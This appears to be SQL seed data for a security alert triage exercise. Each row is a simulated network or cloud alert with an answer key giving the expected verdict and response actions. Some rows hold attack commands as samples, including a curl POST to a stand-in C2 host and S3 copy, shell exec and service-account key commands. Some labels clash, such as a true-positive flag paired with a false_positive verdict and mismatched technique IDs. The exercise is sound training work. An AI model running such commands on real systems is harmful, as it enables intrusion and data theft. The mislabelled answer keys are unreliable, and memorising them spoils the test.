(1958, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'A series of network scans were detected originating from an internal server. These scans are part of routine vulnerability assessment procedures.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.255\",\"username\":\"admin\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sP 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert corresponds to a known and scheduled vulnerability scan.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1959, 'Authorized Administrative Backups Triggered Unusual Traffic Patterns', 'low', 'Suricata', 'Network traffic resembling data exfiltration detected, traced back to scheduled backup tasks from an internal server.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.50\",\"username\":\"backupadmin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/ 10.0.0.50:/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of internal backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/ 10.0.0.50:/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup operation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected traffic is consistent with scheduled backup operations.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1960, 'Benign System Health Checks Mistaken for C2 Beaconing', 'low', 'Corelight', 'Network activity originally flagged as potential C2 beaconing was found to be routine system health checks by a legacy application.', 'Lateral Movement', 'T0888', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"healthcheck\",\"hostname\":\"legacy-app-01\",\"command_line\":\"curl http://192.168.2.20:8080/status\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of internal legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://192.168.2.20:8080/status\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity is consistent with regular application health checks.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1961, 'Misconfigured Legacy App Causing False Positive C2 Alerts', 'medium', 'Darktrace', 'Network connections from a legacy application server are triggering C2 alerts due to misconfiguration. Investigation reveals routine internal application processes.', 'C2', 'T1094', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:02:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.25\",\"dst_ip\":\"10.1.1.100\",\"username\":\"legacyadmin\",\"hostname\":\"legacy-app-02\",\"command_line\":\"ping -c 5 10.1.1.100\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to a legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 5 10.1.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network connectivity check\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"The detected activity is due to a known misconfiguration in the legacy application.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1962, 'True Positive: C2 Beaconing Detected from Compromised Host', 'critical', 'Wireshark', 'A compromised host within the network is exhibiting behavior consistent with command and control beaconing to an external IP.', 'C2', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"45.76.67.89\",\"username\":\"unknown\",\"hostname\":\"compromised-host\",\"command_line\":\"curl -X POST http://malicious.c2/command\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.67.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -X POST http://malicious.c2/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with known C2 server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"This alert is confirmed as a true positive due to the nature of the connections and external IP reputation.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1963, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'A network scan was detected originating from an internal IP. This is a routine scan performed by the IT department.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"it_admin\",\"hostname\":\"scan_server\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address used by the IT department for scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine IT scanning command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it involves a routine scan by IT personnel.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1964, 'Authorized Administrative Backup Activity', 'low', 'Corelight', 'Backup data transfer detected from critical server to backup storage. Verified as part of regular backup schedule.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.100\",\"username\":\"backup_service\",\"hostname\":\"main_server\",\"command_line\":\"rsync -av /data 10.0.0.100:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP representing the main server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av /data 10.0.0.100:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This is a scheduled backup operation and not unauthorized data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1965, 'Benign System Health Check', 'low', 'Darktrace', 'Detected network traffic resembling beaconing activity. Identified as routine health check by monitoring tool.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.10\",\"dst_ip\":\"192.168.1.200\",\"username\":\"monitor_service\",\"hostname\":\"monitoring_tool\",\"command_line\":\"health_check --ping --interval 5\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP for monitoring tool.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"health_check --ping --interval 5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"Traffic resembles beaconing but is an internal system health check.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1966, 'Misconfigured Legacy Application Communication', 'medium', 'Wireshark', 'Detected unusual network traffic patterns from a legacy application server. Confirmed as benign due to misconfiguration.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"send_data --port 8080 --protocol TCP\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"send_data --port 8080 --protocol TCP\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command related to misconfigured legacy app communication.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The misconfigured application is causing unusual traffic patterns, not data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1967, 'Suspicious Network Connection from External IP', 'high', 'Suricata', 'A connection attempt was detected from a foreign IP address with a history of malicious activity, targeting an internal server.', 'C2 Beaconing', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"unknown\",\"hostname\":\"target_server\",\"command_line\":null}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted server.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The alert is a true positive due to malicious intent from a known bad actor IP.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1968, 'Suspicious Internal Network Traffic Detected', 'medium', 'Zeek', 'Internal network scan detected originating from an authorized vulnerability assessment tool. Traffic resembles lateral movement patterns.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"audit_user\",\"hostname\":\"vuln-scan01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal vulnerability scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is an internal asset\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic is consistent with authorized internal network scanning activities.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1969, 'Routine Administrative Backup Process Detected', 'low', 'Corelight', 'Data transfer detected to backup server from internal database server. Activity resembles data exfiltration.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.200\",\"username\":\"backup_admin\",\"hostname\":\"db-server01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal database server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This activity is a normal backup operation scheduled by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1970, 'Legacy Application Misconfiguration Detected', 'medium', 'Suricata', 'Unexpected outbound traffic from a legacy application server to an external IP address. Initially flagged as C2 beaconing.', 'C2 Beaconing', 'T1105', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"legacy_app\",\"hostname\":\"legacy-app01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP assigned to legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for unusual traffic patterns\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The traffic is due to a misconfigured application attempting to update from a deprecated service.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1971, 'False Positive: Authorized System Health Check', 'low', 'Wireshark', 'Regular system health check traffic detected from a monitoring system. Initially interpreted as potential lateral movement.', 'Lateral Movement', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.25\",\"dst_ip\":\"192.168.4.30\",\"username\":\"monitor\",\"hostname\":\"monitoring01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP assigned to authorized monitoring system\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is a monitored internal system\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This is expected traffic and part of the scheduled system health checks.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1972, 'Unauthorized C2 Beaconing Detected', 'high', 'Darktrace', 'Detected external communication with a known malicious IP. Traffic patterns suggest C2 beaconing from an internal host.', 'C2 Beaconing', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.15\",\"dst_ip\":\"198.51.100.20\",\"username\":\"unknown_user\",\"hostname\":\"workstation-15\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to an internal workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for C2 activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The communication with a known malicious IP indicates likely C2 beaconing activity.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1973, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket was detected from an external IP. Data exfiltration is suspected.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unknown\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /my-sensitive-bucket\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for unauthorized access\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Frequent target for unauthorized data access\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /my-sensitive-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Data exfiltration attempt via S3 API\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access pattern and external IP indicate a deliberate data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1974, 'Azure IAM Privilege Escalation Alert', 'high', 'Azure Defender', 'Suspicious privilege escalation detected. An internal account was granted admin rights unexpectedly.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.doe@company.com\",\"hostname\":\"azure-portal\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee john.doe@company.com --role contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual role assignment detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe@company.com --role contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The privilege escalation was unauthorized and aligns with known attack patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1975, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Detected unauthorized token access to a GCP service account. Potential hijacking attempt.', 'Credential Attack', 'T1550', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"token_use\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.1.1.2\",\"username\":\"service-account@project-id.iam.gserviceaccount.com\",\"hostname\":\"gcp.googleapis.com\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple hijacking attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project-id.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Anomalous access pattern detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of service account credentials\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of an unauthorized token indicates a hijacking attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1976, 'Prisma Cloud: Kubernetes Privilege Escalation', 'high', 'Prisma Cloud', 'Detected privilege escalation activity within a Kubernetes cluster. Unauthorized admin access detected.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.8\",\"dst_ip\":\"172.16.0.10\",\"username\":\"k8s-admin\",\"hostname\":\"kubernetes-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec -it pod -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected admin access detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec -it pod -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Potential privilege escalation within Kubernetes\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The escalation of privileges within the Kubernetes cluster suggests lateral movement.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1977, 'Wiz: Unauthorized API Access Detected', 'medium', 'Wiz', 'Suspicious API requests detected from an unrecognized IP address indicating possible unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:25:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"10.2.3.4\",\"username\":\"api-user\",\"hostname\":\"api.example.com\",\"request_body\":\"POST /v1/data HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"api-user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual API access pattern detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"api.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Frequent target for unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized API requests from a suspicious IP indicate a credential attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1978, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A large amount of data was exfiltrated from an S3 bucket to an unknown IP address. This indicates a potential data leak.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:35:23Z\",\"event_type\":\"s3_data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data.zip HTTP/1.1\",\"command_line\":\"aws s3 cp s3://mybucket/sensitive_data.zip .\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"internal\",\"details\":\"User account is part of the finance department\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive_data.zip HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Indicates potential unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data was accessed and transferred to an external IP without authorization, indicating a data leak.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
